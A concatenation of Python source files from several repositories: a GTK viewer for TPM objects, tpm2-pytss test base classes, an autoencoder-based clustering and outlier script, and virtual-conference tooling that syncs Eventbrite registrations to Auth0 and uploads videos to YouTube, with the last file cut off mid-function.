encodings=[Encoding.String],
),
ValueView(
"Policy",
self._tpm_object,
"policy",
encodings=[Encoding.String],
),
ValueEditView(
"Certificate",
self._tpm_object,
"certificate",
encodings=[Encoding.Info, Encoding.PEM, Encoding.DER],
),
ValueView("NV Type", self._tpm_object, "nv_type", multiline=False),
ValueEditView(
"NV (secure memory)",
self._tpm_object,
"nv",
encodings=[Encoding.String, Encoding.Hex, Encoding.Hexdump],
),
]
for value_view in self._value_views:
value_view.attach_to_grid(self, row)
row += 1
self.update()
def _get_tpm_path(self):
return self._path
def set_tpm_path(self, path):
"""Set the TPM object path. The details of this TPM object are made accessible."""
self._path = path
self._tpm_object = self._tpm.fapi_object(self._path)
for value_view in self._value_views:
value_view.set_tpm_object(self._tpm_object)
self.update()
def reset(self, *args, **kwargs): # pylint: disable=unused-argument
"""Reset all widget state."""
for value_view in self._value_views:
value_view.reset()
def update(self):
"""Update the widget state according to the currently selected path."""
if self._path is not None:
obj = self._tpm.fapi_object(self._path)
self.heading_lbl.set_text(obj.object_type_info)
for value_view in self._value_views:
value_view.automatic_visibility()
value_view.update()
class Objects(Gtk.TreeView):
"""A widget for listing and selecting a FAPI TPM object."""
def _tree_store_append(self, tree_data, path_parent="", piter_parent=None):
"""
Take the dict tree_data and append it to the tree_store
The root key will not be added
"""
for key, value in tree_data.items():
path = f"{path_parent}/{key}"
piter_this = self._store.append(
piter_parent, [key, self._tpm.fapi_object(path).object_type_info]
)
self._tree_store_append(value, path_parent=path, piter_parent=piter_this)
def update(self):
"""
Fetch TPM objects and update tree_view
"""
self._store.clear()
path_tree = self._tpm.get_path_tree()[""]
self._tree_store_append(path_tree)
self.expand_all()
def _path_from_tree_path(self, tree_path):
"""
Get TPM object path from a tree_path object (pointing to a node in tree_store)
"""
model = self.get_model()
# walk through tree from root to node at tree_path
path = ""
walk_indices = []
for walk_index in tree_path:
walk_indices.append(walk_index)
walk_tree_path = Gtk.TreePath.new_from_indices(walk_indices)
path += "/" + model[walk_tree_path][0]
return path
def _on_view_selection_changed(self, selection):
"""
Determine the TPM object path of the selected row and call all listener functions
"""
model, treeiter = selection.get_selected()
tree_path = model.get_path(treeiter)
path = self._path_from_tree_path(tree_path)
if self.on_selection_fcns is not None:
for on_selection_fcn in self.on_selection_fcns:
on_selection_fcn(path)
def __init__(self, tpm, on_selection_fcns=None):
super().__init__()
self._tpm = tpm
self._store = Gtk.TreeStore(str, str)
self.set_hexpand(False)
self.set_vexpand(False)
self.set_model(self._store)
# TODO selection must be always exactly 1 (comma must not unselect)
# column TPM Entity
renderer_column_obj = Gtk.CellRendererText()
column_obj = Gtk.TreeViewColumn("TPM Entity", renderer_column_obj, text=0)
self.append_column(column_obj)
# column Info
renderer_column_info = Gtk.CellRendererText()
column_info = Gtk.TreeViewColumn("Info", renderer_column_info, text=1)
self.append_column(column_info)
select = self.get_selection()
select.connect("changed", self._on_view_selection_changed)
if on_selection_fcns is not None:
self.on_selection_fcns = on_selection_fcns
else:
self.on_selection_fcns = []
self.update()
```
#### File: tpm2_gui/ui/widgets.py
```python
import gi # isort:skip
gi.require_version("Gtk", "3.0") # pylint: disable=wrong-import-position
# isort:imports-thirdparty
from gi.repository import Gtk
from .encoding import Encoder, Encoding
class EncodingChooser(Gtk.ComboBox):
"""Widget to choose an encoding from a list of options."""
def __init__(self, options, on_selection=None):
super().__init__()
self.options = Gtk.ListStore(int, str)
for encoding_option in options:
self.options.append([int(encoding_option), str(encoding_option)])
self.set_model(self.options)
cell = Gtk.CellRendererText()
self.pack_start(cell, True)
self.add_attribute(cell, "text", 1)
self.set_active(0)
self.connect("changed", self._on_changed)
self._on_selection = []
if on_selection:
self._on_selection.append(on_selection)
@property
def selected(self):
"""The Encoding currently selected."""
index = self.get_model()[self.get_active_iter()][:2][0]
return Encoding(index)
def _on_changed(self, _widget):
for callback in self._on_selection:
callback(self.selected)
class ValueView:
"""A text field consisting of a label, a text box and a button for editing and saving."""
def __init__(self, label, obj, attr, encodings=None, multiline=True):
self._obj = obj
self._attr = attr
self._encoding = Encoding.String
self._encoding_cmb = None
if encodings:
self._encoding = encodings[0]
if len(encodings) > 1:
self._encoding_cmb = EncodingChooser(encodings, self._on_encoding_changed)
self._encoding_cmb_vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self._encoding_cmb_vbox.add(self._encoding_cmb)
self._label = Gtk.Label(label=label, xalign=0)
self._label.set_width_chars(16)
if multiline:
self._textview_model = Gtk.TextBuffer()
self._textview = Gtk.TextView(buffer=self._textview_model)
self._textview.set_hexpand(True)
self._textview.set_monospace(True)
self._textview.set_editable(False)
scroll = Gtk.ScrolledWindow()
scroll.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
scroll.set_max_content_height(200)
scroll.set_min_content_width(500)
scroll.set_propagate_natural_height(True)
scroll.add(self._textview)
frame = Gtk.Frame()
frame.add(scroll)
self._textview_widget = frame
else:
self._textview = Gtk.Entry()
self._textview.set_hexpand(True)
self._textview.set_editable(False)
self._textview_model = self._textview
self._textview_widget = self._textview
self.update()
def _on_encoding_changed(self, encoding):
self._encoding = encoding
self.update()
def set_tpm_object(self, obj):
"""Set TPM object whose whose attribute is made accessible."""
self._obj = obj
self.update()
def hide(self):
"""Hide all associated widgets."""
self._label.hide()
self._textview_widget.hide()
if self._encoding_cmb:
self._encoding_cmb_vbox.hide()
def show(self):
"""Show all associated widgets."""
self._label.show()
self._textview_widget.show()
if self._encoding_cmb:
self._encoding_cmb_vbox.show()
def automatic_visibility(self):
"""Show if TPM attribute exists for path, hide otherwise."""
if self._obj is None or getattr(self._obj, self._attr) is None:
self.hide()
else:
self.show()
def reset(self): # pylint: disable=unused-argument
"""Reset all widget state."""
self._textview.set_editable(False)
self.update()
def attach_to_grid(self, grid, row):
"""Attach all wigets to a given row in a Gtk.Grid."""
grid.attach(self._label, 0, row, 1, 1)
grid.attach(self._textview_widget, 1, row, 1, 1)
if self._encoding_cmb:
grid.attach(self._encoding_cmb_vbox, 2, row, 1, 1)
def update(self):
"""Update the widget state according to the currently selected path."""
if self._obj is not None:
text = getattr(self._obj, self._attr)
if text is not None:
self._textview_model.set_text(Encoder.encode(text, self._encoding))
class ValueEditView(ValueView):
"""A text field consisting of a label, a text box and a button for editing and saving."""
def __init__(self, label, obj, attr, encodings=None, multiline=True):
super().__init__(label, obj, attr, encodings, multiline)
self._button = Gtk.Button(label="Edit")
self._button.connect("clicked", self._on_button_clicked)
self._button_vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self._button_vbox.add(self._button)
self.update()
def _on_button_clicked(self, button): # pylint: disable=unused-argument
if self._textview.get_editable():
# Save the edited text
text = self._textview_model.get_text(
self._textview_model.get_start_iter(), self._textview_model.get_end_iter(), True
)
setattr(self._obj, self._attr, text)
self._textview.set_editable(False)
else:
# Enable editing text
self._textview.set_editable(True)
self.update()
def hide(self):
"""Hide all associated widgets."""
super().hide()
self._button_vbox.hide()
def show(self):
"""Show all associated widgets."""
super().show()
self._button_vbox.show()
def reset(self): # pylint: disable=unused-argument
"""Reset all widget state."""
super().reset()
self.update()
def attach_to_grid(self, grid, row):
super().attach_to_grid(grid, row)
grid.attach(self._button_vbox, 3, row, 1, 1)
def update(self):
"""Update the widget state according to the currently selected path."""
super().update()
if self._obj is not None:
text = str(getattr(self._obj, self._attr))
self._button.set_sensitive(text is not None)
if self._textview.get_editable():
self._button.set_label("Safe")
else:
self._button.set_label("Edit")
``` |
{
"source": "joholl/tpm2-pytss",
"score": 2
} |
#### File: tpm2_pytss/util/testing.py
```python
import os
import time
import tempfile
import unittest
import contextlib
from .. import tcti
from ..esys import ESYS
from ..fapi import FAPI, FAPIDefaultConfig
from ..exceptions import TPM2Error
from .simulator import SimulatorTest
from .retry import TCTI_RETRY_TRIES
ENV_TCTI = "PYESYS_TCTI"
ENV_TCTI_DEFAULT = "mssim"
ENV_TCTI_CONFIG = "PYESYS_TCTI_CONFIG"
ENV_TCTI_CONFIG_DEFAULT = None
class BaseTestESYS(SimulatorTest, unittest.TestCase):
"""
ESYS tests should subclass from this
"""
def setUp(self):
super().setUp()
self.esys = ESYS()
self.tcti = tcti.TCTI.load(os.getenv(ENV_TCTI, default=ENV_TCTI_DEFAULT))
self.tcti_config = os.getenv(
ENV_TCTI_CONFIG, default="port=%d" % (self.simulator.port)
)
# Create a context stack
self.ctx_stack = contextlib.ExitStack().__enter__()
# Enter the contexts
self.tcti_ctx = self.ctx_stack.enter_context(
self.tcti(config=self.tcti_config, retry=TCTI_RETRY_TRIES)
)
self.esys_ctx = self.ctx_stack.enter_context(self.esys(self.tcti_ctx))
# Call Startup and clear the TPM
self.esys_ctx.Startup(self.esys_ctx.TPM2_SU_CLEAR)
# Set the timeout to blocking
self.esys_ctx.SetTimeout(self.esys_ctx.TSS2_TCTI_TIMEOUT_BLOCK)
def tearDown(self):
super().tearDown()
self.ctx_stack.__exit__(None, None, None)
class BaseTestFAPI(SimulatorTest, unittest.TestCase):
"""
FAPI tests should subclass from this
"""
def setUp(self):
super().setUp()
# Create a context stack
self.ctx_stack = contextlib.ExitStack().__enter__()
# Create temporary directories
self.user_dir = self.ctx_stack.enter_context(tempfile.TemporaryDirectory())
self.log_dir = self.ctx_stack.enter_context(tempfile.TemporaryDirectory())
self.system_dir = self.ctx_stack.enter_context(tempfile.TemporaryDirectory())
# Create the FAPI object
self.fapi = FAPI(
FAPIDefaultConfig._replace(
user_dir=self.user_dir,
system_dir=self.system_dir,
log_dir=self.log_dir,
tcti="mssim:port=%d" % (self.simulator.port,),
tcti_retry=TCTI_RETRY_TRIES,
ek_cert_less=1,
)
)
# Enter the context
self.fapi_ctx = self.ctx_stack.enter_context(self.fapi)
def tearDown(self):
super().tearDown()
self.ctx_stack.__exit__(None, None, None)
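# --- Hedged example (illustrative addition, not part of the original module) ---
# A minimal sketch of how a test module might build on the base classes above; the
# class and test names are hypothetical and only touch attributes created in setUp().
class ExampleSmokeTestESYS(BaseTestESYS):
    def test_context_created(self):
        # setUp() above opened the TCTI/ESYS contexts and sent Startup/SetTimeout
        self.assertIsNotNone(self.esys_ctx)
class ExampleSmokeTestFAPI(BaseTestFAPI):
    def test_context_created(self):
        # setUp() above created temporary keystore directories and entered the FAPI context
        self.assertIsNotNone(self.fapi_ctx)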
``` |
{
"source": "johpetsc/autoencoder-clustering",
"score": 3
} |
#### File: autoencoder-clustering/src/autoencoder.py
```python
import pandas as pd
from datetime import datetime
import tensorflow as tf
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
SEQLEN = 25
EMBEDDING_SIZE = 25
def generate_data():
data = pd.read_excel('../dataset/minioutput.xlsx')
data = data.sample(frac = 1, random_state=7).reset_index(drop=True)
data.drop('Unnamed: 0', axis=1, inplace=True)
final = data.copy()
data.drop('Original', axis=1, inplace=True)
data.drop('Cluster', axis=1, inplace=True)
return data, final
def generate_input(data):
text_input = data.pop('Text')
tokenizer = tf.keras.preprocessing.text.Tokenizer(
filters='',
lower=True, split=' ')
tokenizer.fit_on_texts(text_input)
x = tokenizer.texts_to_sequences(text_input)
res = tf.keras.preprocessing.sequence.pad_sequences(x, maxlen=25,
padding='post')
vocab_size = len(tokenizer.word_index)
standard_scaler = StandardScaler()
data_standard = standard_scaler.fit_transform(data)
final_data = {'data_input': data_standard, 'text_input': res}
final_data_out = {'decoded_data': data_standard, 'decoded_txt': res}
return final_data, final_data_out, vocab_size
def plot_graphs(history, metric):
plt.plot(history.history[metric])
plt.plot(history.history['val_'+metric], '')
plt.xlabel("Epochs")
plt.ylabel(metric)
plt.legend([metric, 'val_'+metric])
plot_name = '../results/' + metric + '.svg'
#plt.savefig(plot_name)
plt.show()
def autoencoder(final_data, final_data_out, vocab_size):
len_data = final_data["data_input"].shape[1]
data_input = tf.keras.layers.Input(shape=(len_data, ), name='data_input')
text_input = tf.keras.layers.Input(shape=(SEQLEN,), name='text_input')
x = tf.keras.layers.Embedding(vocab_size + 1, EMBEDDING_SIZE,
input_length=SEQLEN)(text_input)
text_output = tf.keras.layers.LSTM(SEQLEN, activation='relu')(x)
concat_inputs = tf.keras.layers.concatenate([data_input, text_output])
encoded = tf.keras.layers.Dense(16, activation='relu')(concat_inputs)
# encoded = tf.keras.layers.Dropout(0.2)(encoded)
encoded = tf.keras.layers.Dense(8, activation='relu')(encoded)
# encoded = tf.keras.layers.Dropout(0.2)(encoded)
encoded = tf.keras.layers.Dense(4, activation='relu')(encoded)
decoded = tf.keras.layers.Dense(4, activation='relu')(encoded)
# decoded = tf.keras.layers.Dropout(0.2)(decoded)
decoded = tf.keras.layers.Dense(8, activation='relu')(decoded)
# decoded = tf.keras.layers.Dropout(0.2)(decoded)
decoded = tf.keras.layers.Dense(16, activation='relu')(decoded)
decoded_data = tf.keras.layers.Dense(len_data, name='decoded_data')(decoded)
decoded_text = tf.keras.layers.Dense(SEQLEN, name='decoded_txt')(decoded)
decoded = [decoded_data, decoded_text]
ae_input_layers = {'data_input': data_input,
'text_input': text_input}
ae_output_layers = {'decoded_data': decoded[0],
'decoded_txt': decoded[1]}
autoencoder = tf.keras.Model(ae_input_layers, ae_output_layers)
autoencoder.compile(optimizer=tf.keras.optimizers.Adam(0.001),
loss='mse',
metrics=['mse', 'mae'])
print(autoencoder.summary())
history = autoencoder.fit(final_data, final_data_out,
epochs=100,
validation_split=0.2
)
predicted = autoencoder.predict(final_data)
metrics = ['loss', 'decoded_data_loss', 'decoded_txt_loss', 'decoded_data_mse', 'decoded_data_mae', 'decoded_txt_mse', 'decoded_txt_mae']
for metric in metrics:
plot_graphs(history, metric)
return predicted
def outliers(final, predicted):
final['decoded_txt'] = predicted['decoded_txt'].std(axis=1).tolist()
final['raw'] = predicted['decoded_txt'].tolist()
final['decoded_data'] = predicted['decoded_data'].mean(axis=1).tolist()
final = final.sort_values(by=['decoded_txt', 'decoded_data']).reset_index(drop=True)
def main():
data, final = generate_data()
final_data, final_data_out, vocab_size = generate_input(data)
predicted = autoencoder(final_data, final_data_out, vocab_size)
outliers(final, predicted)
if __name__ == '__main__':
main()
```
#### File: autoencoder-clustering/src/outliers.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.spatial.distance import cdist
pd.options.mode.chained_assignment = None
def plot_outliers(outliers, inliers, center, df):
plt.scatter(inliers['Quantity'] , inliers['Price'], label='Inliers')
plt.scatter(outliers['Quantity'] , outliers['Price'], s=60, color='red', marker='x', label='Outliers')
plt.scatter(center[:,0] , center[:,1] , s = 80, color='black', marker='^', label='Center')
plt.ylabel('Price', fontsize=10)
plt.xlabel('Quantity', fontsize=10)
plt.title('Cluster ' + str(df['Cluster'].iloc[0]))
plt.ylim(ymin=0)
plt.xlim(xmin=0)
plt.legend(loc="upper right")
plt.show()
def limit_outliers(df):
Q1, Q3 = np.percentile(df['Quantity'], [20, 80])
IQR = Q3 - Q1
x_upper_limit = Q3 + 1.5 * IQR
x_lower_limit = Q1 - 1.5 * IQR
Q1, Q3 = np.percentile(df['Price'], [25, 75])
IQR = Q3 - Q1
y_upper_limit = Q3 + 1.5 * IQR
y_lower_limit = Q1 - 1.5 * IQR
x_axis = df['Quantity'].mean()
y_axis = df['Price'].mean()
x_threshold = max(1,5 * x_axis, x_upper_limit)
y_threshold = max(1,5 * y_axis, y_upper_limit)
center = np.array([x_axis, y_axis]).reshape(1, -1)
df.loc[(df['Quantity'] > x_threshold), 'Outlier'] = 1
df.loc[(df['Price'] > y_threshold), 'Outlier'] = 1
#plot_outliers(df.loc[df['Outlier'] == 1], df.loc[df['Outlier'] == 0], center, df)
#print(df)
return df
def distance_outliers(df):
x_axis = df['Quantity'].mean()
y_axis = df['Price'].mean()
center = np.array([x_axis, y_axis]).reshape(1, -1)
distances = cdist(center, df[['Quantity', 'Price']], 'seuclidean')
df['Distance'] = np.transpose(distances)
outliers = df[df['Distance'] >= np.percentile(df['Distance'], 95)]
df.loc[df['Distance'] >= np.percentile(df['Distance'], 95), 'Outlier'] = 1
inliers = df[df['Distance'] < np.percentile(df['Distance'], 95)]
print(outliers)
df = df.drop(columns='Distance')
plot_outliers(outliers, inliers, center, df)
return df
def main():
data = pd.read_excel('../dataset/output.xlsx')
data['Outlier'] = 0
for x in range (0, 2400):
cluster = data[(data['Cluster'] == x)]
print("Cluster: ", x)
if(cluster.shape[0] > 1):
df = limit_outliers(cluster)
data[data['Cluster'] == x] = df
elif(cluster.shape[0] == 1):
cluster['Outlier'] = 1
data[data['Cluster'] == x] = cluster
data.to_excel("../dataset/outliers.xlsx", index=False)
if __name__ == '__main__':
main()
``` |
{
"source": "johpro/virtual-conference",
"score": 4
} |
#### File: virtual-conference/core/papers_db.py
```python
from typing import List
import csv
import os
import json
import uuid
class PapersDatabase:
"""
Read the stored metadata of papers/sessions from a CSV file, for instance one exported from the Google Sheets workbook.
"""
def __init__(self, csv_file : str):
""" Load and parse the specified csv file. First row must contain headers.
"""
self.csv_file = csv_file
data : List[dict] = []
self.data = data
self.data_by_uid : dict = {}
if not os.path.isfile(csv_file):
raise RuntimeError(f"Could not find the specified csv_file '{csv_file}'")
with open(csv_file, 'r') as f:
reader = csv.DictReader(f)
self.fieldnames = reader.fieldnames
for row in reader:
uid :str = row['UID']
if not uid:
raise RuntimeError(f"each entry in db needs to provide UID")
if uid in self.data_by_uid:
raise RuntimeError(f"each entry in db needs a *unique* UID, '{uid}' appears at least twice")
data.append(row)
self.data_by_uid[uid] = row
def save(self, target_fn : str = None):
"""Saves paper db to .csv file. Overwrites existing db file if no other target filename is specified.
"""
if not target_fn:
target_fn = self.csv_file
temp_fn = target_fn + str(uuid.uuid4())
with open(temp_fn, 'w', newline='') as f:
writer = csv.DictWriter(f, self.fieldnames)
writer.writeheader()
writer.writerows(self.data)
os.replace(temp_fn, target_fn)
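# --- Hedged usage sketch (illustrative addition, not part of the original module) ---
# The file names are hypothetical; the CSV only needs a header row containing a
# unique "UID" column, as enforced in __init__ above.
if __name__ == "__main__":
    db = PapersDatabase("papers.csv")                        # hypothetical path
    print(f"loaded {len(db.data)} entries with columns {db.fieldnames}")
    first_uid = db.data[0]["UID"]
    print(db.data_by_uid[first_uid])                         # same dict object as db.data[0]
    db.save("papers_copy.csv")                               # atomic write via temp file + os.replace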
```
#### File: johpro/virtual-conference/populate_paper_pdf_info.py
```python
import sys
import pprint
import re
import os
import core.schedule as schedule
nonalphanumeric = re.compile("[^A-Za-z0-9]")
def make_normalized_title(title):
if not title:
return ""
norm = nonalphanumeric.sub("", title)
norm = norm.lower()
if len(norm) > 64:
return norm[0:64]
return norm
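# Worked example (added comment): "Deep Learning for Vis!" -> strip non-alphanumerics
# -> "DeepLearningforVis" -> lower() -> "deeplearningforvis" (truncated to 64 chars only
# if longer). This normalized form is what lets PDF file names match paper titles below.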
USAGE = """
./populate_paper_pdf_info.py <schedule_db.xlsx> <PDF root dir>
"""
if len(sys.argv) != 3:
print(USAGE)
sys.exit(1)
schedule_db = schedule.Database(sys.argv[1])
pdf_root_path = os.path.normpath(sys.argv[2])
pdf_files = {}
# Collect all the videos, subtitle, image and image caption info for this event indexed by UID
print(f"Collecting all PDFs under {pdf_root_path}")
for path, dirs, files in os.walk(pdf_root_path):
for f in files:
basename = os.path.basename(f)
title, ext = os.path.splitext(basename)
if ext != ".pdf":
continue
filename = os.path.join(path, f)
relpath = os.path.relpath(filename, start=pdf_root_path)
pdf_files[make_normalized_title(title)] = {
"path": "papers/" + relpath,
"used": False
}
# Iterate through the schedule and match up each PDF with its paper
days = ["sunday", "monday", "tuesday", "wednesday", "thursday", "friday"]
for d in days:
day_info = schedule_db.get_day(d)
sessions = day_info.get_sessions(False)
for k, v in sessions.items():
for i in range(v.num_timeslots()):
uid = v.timeslot_entry(i, "UID").value
if not uid:
continue
title = v.timeslot_entry(i, 'Time Slot Title').value
normtitle = make_normalized_title(title)
if normtitle in pdf_files:
pdf_file = pdf_files[normtitle]["path"]
#print(f"Matched {title} to {pdf_file}")
v.timeslot_entry(i, "PDF File").value = pdf_file
pdf_files[normtitle]["used"] = True
schedule_db.save("populate_pdf_info_out.xlsx")
# Make sure we matched up all the videos we found
for k, v in pdf_files.items():
if not v["used"]:
fname = v["path"]
print(f"ERROR: PDF {fname} was not used! Slug {k}")
pprint.pprint(v)
```
#### File: johpro/virtual-conference/sync_eventbrite_to_auth0.py
```python
import argparse
import sys
import time
import os
import json
import os.path as path
import bcrypt # bcrypt
import string
import secrets
import http.client
import requests
from urllib.parse import urlsplit
from datetime import datetime
from email.mime.image import MIMEImage
import core.auth as auth
import core.schedule as schedule
alphabet = string.ascii_letters + string.digits
def load_logo_attachment(filename):
with open(filename, "rb") as f:
attachment = MIMEImage(f.read())
attachment.add_header("Content-Disposition", "inline", filename=filename)
attachment.add_header("Content-ID", "<logo_image>")
return attachment
def load_already_registered():
res = {}
if path.exists("registered.json"):
with open("registered.json", "r") as f:
res = json.load(f)
return res
def format_to_auth0(email, name, password, password_hash):
return {
"email": email,
"email_verified": True,
"name": name,
"password_hash": <PASSWORD>('utf-8'),
}
def send_to_auth0(session, filename, access_token, connection_id):
payload = {
"connection_id": connection_id,
"external_id": "import_user",
"send_completion_email": False
}
files = {
"users": open(filename, "rb")
}
headers = {
'authorization': f"Bearer {access_token}"
}
domain = "https://" + urlsplit(session.auth0["audience"]).netloc + "/api/v2/jobs/users-imports"
response = requests.post(domain, data=payload, files=files,
headers=headers)
print(response.content)
def send_register_email(email, session, logo_attachment, name, password):
discord_invite = ""
if not "SUPERMINISTREAM_DISCORD_INVITE" in os.environ:
print("WARNING: You must provide the discord_invite url in $SUPERMINISTREAM_DISCORD_INVITE")
else:
discord_invite = os.environ["SUPERMINISTREAM_DISCORD_INVITE"]
# Send them an email with the account name and password
email_html = f"""
<p>Dear {name},</p>
<p>Thank you for registering for VIS2021! We have a great week scheduled of paper
presentations, workshops, tutorials, panels, and more!
This email contains your login information for the virtual conference website:
<a href="https://virtual.ieeevis.org/">https://virtual.ieeevis.org/</a>.
The website contains the conference schedule, the virtual conference rooms
where you can watch the presentations, Discord chat channels for each session,
and links to download
the papers. Try shuffling the
<a href="https://virtual.ieeevis.org/papers.html">paper browser</a> by serendipity to find
something totally new!
</p>
<ul>
<li><b>User name:</b> {email}</li>
<li><b>Password:</b> {password}</li>
<li><b>Discord Invite: {discord_invite}</b> </li>
</ul>
<img width='400' src='cid:logo_image' alt='Logo'/>
"""
plain_text = f"""
Dear {name},
Thank you for registering for VIS2021! We have a great week scheduled of paper
presentations, workshops, tutorials, panels, and more!
This email contains your login information for the virtual conference website:
https://virtual.ieeevis.org/.
The website contains the conference schedule, the virtual conference rooms where
you can watch the presentations,
Discord chat channels for each session, and links to download
the papers. Try shuffling the paper browser
https://virtual.ieeevis.org/papers.html by serendipity to find
something totally new!
User name: {email}
Password: {password}
Discord Invite: {discord_invite}
"""
attachments = None
if logo_attachment:
attachments = [logo_attachment]
schedule.send_html_email("VIS 2021 Registration",
email_html,
email,
session.email,
alternative_text=plain_text,
attachments=attachments)
def get_any_password_requests():
password_requests = []
for f in os.listdir("./"):
if f.startswith("password_request"):
with open(f, "r") as fhandle:
for l in fhandle.readlines():
line = l.strip()
if len(line) > 0:
password_requests.append(line)
print(f"Got password requests {password_requests}")
return password_requests
def get_new_eventbrite(session):
eventbrite_event_id = session.eventbrite_event_id
# Get the resource URI for the attendee page since we have to do the paginated
# requests ourselves
attendees = session.eventbrite.get_event_attendees(eventbrite_event_id)
last_page = attendees["pagination"]["page_count"]
# Note: Eventbrite's python SDK is half written essentially, and
# doesn't directly support paging properly. So to load the other
# pages we need to use the raw get call ourselves instead of
# being able to continue calling get_event_attendees
# It looks like we can also directly request a page by passing page: <number>
eventbrite_registrations = []
# Page indices start at 1 inclusive
for i in range(1, last_page + 1):
print(f"Fetching eventbrite registrations page {i} of {last_page}")
args = {
'page': i
}
attendees = session.eventbrite.get(attendees.resource_uri, args)
if not "attendees" in attendees:
print("Error fetching eventbrite response?")
print(attendees)
break
for a in attendees["attendees"]:
eventbrite_registrations.append((
a["profile"]["name"],
a["profile"]["email"]
))
return eventbrite_registrations
def get_all(transmit_to_auth0, session, logo_attachment, max_new=-1):
results = get_new_eventbrite(session)
password_requests = get_any_password_requests()
all_registered = load_already_registered()
all_new = []
for email, x in all_registered.items():
if "emailed" not in x:
x["emailed"] = False
if not x["emailed"]:
results.append([x["name"], x["email"]])
now = str(datetime.utcnow())
for x in results:
name, email = x
if max_new > 0 and len(all_new) >= max_new:
break
if len(email) == 0:
continue
# We use this same process to re-send someone their login info, so they could be
# already registered
if email not in all_registered or not all_registered[email]["emailed"]:
print(f"adding {email}")
# random password
password = ""
if email not in all_registered:
password = ''.join(secrets.choice(alphabet) for i in range(10)).encode("utf-8")
else:
password = all_registered[email]["password"].encode("utf-8")
salt = bcrypt.gensalt(rounds=10)
password_hash = bcrypt.hashpw(password, salt)
all_new.append(format_to_auth0(email, name, password, password_hash))
all_registered[email] = {"name": name,
"email": email,
"password": <PASSWORD>('<PASSWORD>'),
"date": now,
"emailed": False}
elif email in password_requests:
print(f"Password request for {email}")
else:
continue
password = all_registered[email]["password"]
if session.email:
time.sleep(0.1)
try:
if session.email:
send_register_email(email, session, logo_attachment, name, password)
all_registered[email]["emailed"] = True
except Exception as e:
print("Error sending email {}".format(e))
print(f"Got {len(all_new)} new registrations")
registration_stats = {}
registration_stats_file = "registration_stats.json"
if os.path.isfile(registration_stats_file):
with open("registration_stats.json", "r") as f:
registration_stats = json.load(f)
registration_stats["new_since_last"] += len(all_new)
else:
registration_stats["new_since_last"] = len(all_new)
print(registration_stats)
with open(registration_stats_file, "w") as f:
json.dump(registration_stats, f)
if len(all_new) > 0:
file_name = f"new_imports_{time.time_ns() / 1000}.json"
with open(file_name, "w") as f:
json.dump(all_new, f)
if transmit_to_auth0:
print("Sending to Auth0")
token = session.get_auth0_token()
send_to_auth0(session, file_name, token, session.auth0["connection_id"])
with open("registered.json", "w") as f:
json.dump(all_registered, f, indent=4)
print(f"New registrations processed at {datetime.now()}")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Sync Eventbrite registrations to Auth0 and email login details to new attendees.')
parser.add_argument('--mail', action="store_true", help='send email for new users')
parser.add_argument('--auth0', action="store_true", help='send new users to Auth0')
parser.add_argument('--limit', default=-1, type=int, help='maximum number of new users for this run')
parser.add_argument("--logo", default=None, type=str, help='path to vis 2021 logo')
args = parser.parse_args()
session = auth.Authentication(email=args.mail, eventbrite_api=True, auth0_api=True)
logo_attachment = None
if args.logo:
logo_attachment = load_logo_attachment(args.logo)
while True:
print("Checking for new registrations")
get_all(args.auth0, session, logo_attachment, args.limit)
time.sleep(15 * 60)
```
#### File: johpro/virtual-conference/upload_yt_videos.py
```python
import sys
import os
import http.client
import httplib2
import time
from docopt import docopt
from apiclient.http import MediaFileUpload
from apiclient.errors import HttpError
import core.schedule as schedule
import core.auth as conf_auth
import core.excel_db as excel_db
USAGE = """
Upload the Videos to YouTube
Usage:
upload_yt_videos.py <video_list.xlsx> <video_root_path> [--no-update]
"""
arguments = docopt(USAGE)
sheet_name = "friday"
title_field = "Time Slot Title"
authors_field = "Authors"
description_field = "Abstract"
video_file_field = "Video File"
subtitles_file_field = "Subtitles File"
playlist_prefix_field = "Event"
playlist_field = "Session"
out_youtube_video_field = "Youtube Video"
out_youtube_playlist_field = "Youtube Playlist"
infile = arguments["<video_list.xlsx>"]
outfile = os.path.splitext(infile)[0] + "_uploaded.xlsx"
video_db = excel_db.open(infile)
video_table = video_db.get_table(sheet_name)
video_root_path = arguments["<video_root_path>"]
update_descriptions = not arguments["--no-update"]
RETRIABLE_STATUS_CODES = [500, 502, 503, 504]
RETRIABLE_EXCEPTIONS = (httplib2.HttpLib2Error, IOError, http.client.NotConnected,
http.client.IncompleteRead, http.client.ImproperConnectionState,
http.client.CannotSendRequest, http.client.CannotSendHeader,
http.client.ResponseNotReady, http.client.BadStatusLine)
def upload_video(video, title, description, auth):
upload_request = auth.youtube.videos().insert(
part="id,status,snippet",
body = {
"snippet": {
"title": title,
"description": description,
"categoryId": 27 # Category 27 is "education"
},
"status": {
"privacyStatus": "unlisted",
"selfDeclaredMadeForKids": False,
"embeddable": True
}
},
media_body=MediaFileUpload(video, chunksize=-1, resumable=True)
)
httplib2.RETRIES = 1
response = None
error = None
retries = 0
while not response:
try:
print(f"Uploading Video:\ntitle = {title}\nauthors = {authors}\nvideo = {video}")
status, response = upload_request.next_chunk()
if response:
if "id" in response:
print(f"Uploaded\ntitle = {title}\nauthors = {authors}\nvideo = {video}")
return response
else:
print("Upload failed with an unexpected response")
return None
except HttpError as e:
if e.resp.status in RETRIABLE_STATUS_CODES:
error = f"Retriable HTTP error {e.resp.status}: {e.content}"
else:
raise e
except RETRIABLE_EXCEPTIONS as e:
error = f"A retriable exception occured {e}"
if error:
print(error)
retries += 1
if retries > 10:
print("Reached max retries, aborting")
break
time.sleep(1)
return None
def update_video(video_id, title, description, auth):
print("Updating\ntitle = {}\nauthors = {}\nvideo = {}".format(title, authors, video_id))
upload_response = auth.youtube.videos().update(
part="id,snippet,status",
body = {
"id": video_id,
"snippet": {
"title": title,
"description": description,
"categoryId": 27 # Category 27 is "education"
}
}
).execute()
return upload_response
def get_all_playlists(auth):
all_playlists = []
page_token = None
while True:
playlists = auth.youtube.playlists().list(
part="snippet,contentDetails",
maxResults=50,
mine=True,
pageToken=page_token
).execute()
all_playlists += playlists["items"]
if "nextPageToken" not in playlists:
break
page_token = playlists["nextPageToken"]
return all_playlists
def get_playlist_items(auth, playlist_id):
all_items = []
page_token = None
while True:
items = auth.youtube.playlistItems().list(
part="id,snippet,status",
maxResults=50,
playlistId=playlist_id,
